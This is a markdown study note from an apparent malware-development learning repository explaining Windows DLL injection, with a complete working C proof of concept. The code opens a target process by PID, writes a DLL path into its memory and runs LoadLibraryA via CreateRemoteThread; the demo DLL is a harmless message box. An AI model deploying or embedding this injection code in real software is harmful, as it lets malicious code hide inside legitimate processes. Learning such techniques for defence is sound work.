Skip to content

Latest commit

 

History

History
111 lines (77 loc) · 4.53 KB

dll-injection.md

File metadata and controls

111 lines (77 loc) · 4.53 KB
description
06-21-2023

📚 DLL Injection

What is DLL Injection?

A process injection technique that allows a malicious actor to be able to inject arbitrary code into another process.

The malware writes the path to it's malicious DLL in the virtual address space of a legit process using WriteProcessMemory(). This function will write data to an area of memory in a specified process.

It will then ensure the remote process loads it by creating a remote thread in the target process. This is performed via CreateRemoteThread().

High Level Explanation

Targeted Program.exe (victim) -> OpenProcess() -> GetProcAddress() -> VirtualAllocEx() -> WriteProcessMemory() -> CreateRemoteThread()

  1. Open/Create a process for injection
  2. Allocate memory for the process
  3. Write DLL's path to the region of allocated memory
  4. Call LoadLibraryA/W/CreateRemoteThread() inside the remote process with the DLL path.

PoC

{% embed url="https://github.com/0xXyc/maldev/blob/main/winAPI/dll-injection/inject-dll.c" %}

This program requires the usage of a single command line argument that will take an valid PID.

Check task manager to target a specific process. This current build works on a Windows 11 machine, targetting a x64 executable, and utilizes a 64 bit DLL as of the time of this writing.

Instructions:

  1. For example, start notepad
  2. Right-click inside of task manager and select "Go to details"
  3. Look for the PID of notepad.exe
  4. Run the syntax below replacing <PID> with the PID of notepad.exe

Syntax:

./inject-dll.exe <PID>

Notice how the Hello World messagebox appears in the same tab as notepad.exe on your taskbar:

Proving our messagebox was successfully injected into notepad.exe

inject-dll.c:

#include <stdio.h>
#include <windows.h>

int main(int argc, char *argv[])
{
    HANDLE processHandle;
    HANDLE threadHandle;
    PVOID remoteBuffer;
    LPCSTR dllPath = "C:\\testcode\\hello-world-x64.dll";
    SIZE_T dllPathLength = strlen(dllPath) + 1;
    PTHREAD_START_ROUTINE threatStartRoutineAddress;

    printf("Injecting DLL to PID: %i\n", atoi(argv[1]));

    processHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, atoi(argv[1]));
    if(!processHandle)
    {
        printf("OpenProcess Failed: %d\n", GetLastError());
        return 0;
    }

    remoteBuffer = VirtualAllocEx(processHandle, NULL, dllPathLength, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
    if(!remoteBuffer)
    {
        printf("VirtualAllocEx Failed: %d\n", GetLastError());
        return 0;
    }

    if(!WriteProcessMemory(processHandle, remoteBuffer, dllPath, dllPathLength, NULL))
    {
        printf("WriteProcessMemory Failed: %d\n", GetLastError());
        return 0;
    }

    threatStartRoutineAddress = (PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryA");
    threadHandle = CreateRemoteThread(processHandle, NULL, 0, threatStartRoutineAddress, remoteBuffer, 0, NULL);
    if(!threadHandle)
    {
        printf("Remote thread failed. %d\n", GetLastError());
        return 0;
    }

    printf("Success\n");

    CloseHandle(threadHandle);
    CloseHandle(processHandle);

    return 0;
}

DLL:

{% embed url="https://github.com/carterjones/hello-world-dll/releases/tag/v1.0.0" %}

To Do:

  • I need to learn how to write my own DLL's